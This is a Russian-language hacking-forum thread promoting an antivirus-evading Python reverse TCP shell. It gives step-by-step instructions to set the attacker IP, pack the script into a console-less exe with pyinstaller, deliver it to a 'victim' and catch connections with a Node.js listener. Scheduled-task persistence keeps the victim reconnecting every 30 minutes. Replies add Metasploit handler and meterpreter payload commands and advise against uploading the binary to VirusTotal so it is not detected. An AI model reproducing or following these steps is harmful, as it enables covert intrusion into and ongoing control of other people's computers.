Статья Обход антивируса (Reverse Python Shell) 100% FUD

Привет.С вами DarkNode )
Сегодня будем обходить антивирус через Python Reverse TCP Shell.
ТОЛЬКО ПОСЛЕ ПРОЧТЕНИЯ НЕ ВЗДУМАЙТЕ ***** СЛИВАТЬ БИНАРНИК НА ВТ (ВирусТотал)

Итак наткнулся на гитхабе на прикольную реалиазацию reverse_tcp_shell через планировщик задач с использованием XML темплейта)
Довольно таки прикольно имхо)

Состоит наш бэкдор опять же таки из двух частей:

Серверная часть:
  • reverse_tcp.py - вредоносный питоновоский скрипт ,который запускается на стороне жертвы
  • может быть упакован в "exe" файл используя pyinstaller
На windows машине , выполните команду:
Код: 
pyinstaller --noconsole --onefile --icon=iconfile.ico reverse_tcp.py
для упаковки в бинарный файл.

listener.js
Простенький мультиклиентный листенер написанный на javascript(node.js)
Команды:
help
exit --- выйти из listener
list --- посмотреть список жертв
connect num --- подкючится к одной жертве
например 'connect 0' подключимся к жертве которая имеет идентификатор 0 в списке
schedule n_minutes --- Планировщик задач|schedule attack(только для Windows only), принудительно указать время каждого конекта к атакуемой машине через определенный интервал в минутах

Качаем:

Код: 
git clone https://github.com/shd101wyy/Python_Reverse_TCP.git
1.png


How to Hack (для Windows)
1)Меняем переменную attacker_ip в reverse_tcp.py на ip address атакуещего.

6.png


2)Запускаем команду pyinstaller --noconsole --onefile reverse_tcp.py создаем reverse_tcp.exe

2.jpg


3)Парим бинарник жертве
4)Запускаем листенер командой nodejs listener.js и ждем конекта жертвы.

3.jpg


5.png


 
  • Нравится
Реакции: Lisenok, molexuse, LiJagger и ещё 8
Нажмите, чтобы раскрыть...
<<-D4rkN0d3_Falc0m->> сказал(а):
schedule n_minutes --- Планировщик задач|schedule attack(только для Windows only), принудительно указать время каждого конекта к атакуемой машине через определенный интервал в минутах
Нажмите, чтобы раскрыть...
скажи, пожалуйста, этот параметр нужно указывать в скрипте, или уже после того как получил сессию?
 
MAdDog719 сказал(а):
скажи, пожалуйста, этот параметр нужно указывать в скрипте, или уже после того как получил сессию?
Нажмите, чтобы раскрыть...
Это команда непосредственно в консоли управления (после запуска nodejs listener.js и когда жертва заразилась) задает интервал каждого последующего подключения.
По умолчанию при запусуке вредоноса жертва будет подкючаться к тебе каждые 30 минут,так как это прописано в скрипте самом.Поэтому можно подредактировать скрипт под себя и опционально указать дефолтный интервал времени в reverse_tcp.py
В даном случае поищи функцию функцию generateSheduleTask()
В твоем случае просто можешь изменить в скрипте
Код: 
xml.write(generateScheduleTask(30))
На
Код: 
xml.write(generateScheduleTask(Нужный_Интервал_В_Минутах))
2016_11_14_121656_1023x481_scrot.png
 
  • Нравится
Реакции: gushmazuko и MAdDog719
<<-D4rkN0d3_Falc0m->> сказал(а):
Это команда непосредственно в консоли управления (после запуска nodejs listener.js и когда жертва заразилась) задает интервал каждого последующего подключения.
По умолчанию при запусуке вредоноса жертва будет подкючаться к тебе каждые 30 минут,так как это прописано в скрипте самом.Поэтому можно подредактировать скрипт под себя и опционально указать дефолтный интервал времени в reverse_tcp.py
В даном случае поищи функцию функцию generateSheduleTask()
В твоем случае просто можешь изменить в скрипте
Код: 
xml.write(generateScheduleTask(30))
На
Код: 
xml.write(generateScheduleTask(Нужный_Интервал_В_Минутах))
2016_11_14_121656_1023x481_scrot.png
Нажмите, чтобы раскрыть...
Понял, спасибо)
 
  • Нравится
Реакции: <~DarkNode~>
я так понял ошибка потому что не установлен PyCrypto, но при установке возникает новая ошибка

b87dd7768c68t.jpg


пока не знаю как побороть проблему
 
решил проблему установив Python 2.7 =)
 
При попытке получить сессию через msfconsole, вылетает ошибка на стороне жертвы
 
Подскажите в какой процес оно прячется?? Каждые 30 мин вылетает ошибка такая как на скрине 3. Уже и перезагружался не помогает.
 
Ошибка вылетает потому что листенер не запущен на стороне атакуещего...
Snymok.jpg


А посмотреть и удалить процес можно в планировщике заданий
Выполнить команду на виндоус машине:
Пуск--->Выполнить--->taskschd.msc
12.png


11.png
 
  • Нравится
Реакции: valerian38 и MAdDog719
<<-D4rkN0d3_Falc0m->> сказал(а):
Метасплоит же не нужен тут...


для этого есть listener.js
Нажмите, чтобы раскрыть...
как бы да, но по моему у метасплоит куда больше возможностей, нежели у listener.js, хотя может я не разобрался как с ним работать, но пока могу только лазать по папкам жертвы, возможно есть способ залить через него какой то бекдор?
 
Легко)
MAdDog719 сказал(а):
как бы да, но по моему у метасплоит куда больше возможностей, нежели у listener.js, хотя может я не разобрался как с ним работать, но пока могу только лазать по папкам жертвы, возможно есть способ залить через него какой то бекдор?
Нажмите, чтобы раскрыть...
Вот написал как это очень легко делаться.
Получить метерпретер сессию
 
  • Нравится
Реакции: Сергей Попов и MAdDog719
Инструмент хороший, все очень легко настроилось, без всяких проблем. вот только не пойму чачем такой сложный процесс перехвата нельзя ли просто
exploit/multi/handler
payload windows/meterpreter/reverse_tcp
и все ?!

не каким образом нет нормально соединения к meterpreter засисает подключении и больше рукопожатие не происходит
как на скриншоте, значит только через listener.js возможно пользоваться
 

Вложения

  • 1.jpg
    1.jpg
    32,2 КБ · Просмотры: 513
Последнее редактирование модератором:
Drupa сказал(а):
Инструмент хороший, все очень легко настроилось, без всяких проблем. вот только не пойму чачем такой сложный процесс перехвата нельзя ли просто
exploit/multi/handler
payload windows/meterpreter/reverse_tcp
и все ?!

не каким образом нет нормально соединения к meterpreter засисает подключении и больше рукопожатие не происходит
как на скриншоте, значит только через listener.js возможно пользоваться
Нажмите, чтобы раскрыть...
Попробуй другой пейлоад:
Снимок.PNG
 
~~DarkNode~~ сказал(а):
Попробуй другой пейлоад:
Посмотреть вложение 8233
Нажмите, чтобы раскрыть...
Попробовал конект происходит и тут же отключается как видно на скришноше. Что можно придумать ?

ошибку я понял так : дисконект происходит потому, что exe отличается шифрованием поэтому этот пайлоад не может с ним работать. Если я не прав или что то не понимаю, прошу поправьте меня пожалуйста
 

Вложения

  • 2016-12-24_113302.jpg
    2016-12-24_113302.jpg
    49,1 КБ · Просмотры: 486
Последнее редактирование модератором:
~~DarkNode~~ сказал(а):
Попробуй другой пейлоад:
Посмотреть вложение 8233
Нажмите, чтобы раскрыть...
что это он мне пишет??? я не могу понять инструкцию:( я выполняю комаеду---
root@DDoS:~# git clone https://github.com/shd101wyy/Python_Reverse_TCP.git
Клонирование в «Python_Reverse_TCP»…
fatal: unable to access 'https://github.com/shd101wyy/Python_Reverse_TCP.git/': Received HTTP code 503 from proxy after CONNECT

Могу ли я упаковать в exe на linux kali машине???
 
Последнее редактирование модератором:
for(i=0;i<225;i++); сказал(а):
Received HTTP code 503 from proxy after CONNECT
Нажмите, чтобы раскрыть...

Вот Вам же пишет система в чем проблема, не можете настроить связь через ТОР или прокси для всей системы - учите или качайте архивом через кнопку Download через браузер
12637564.jpg
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ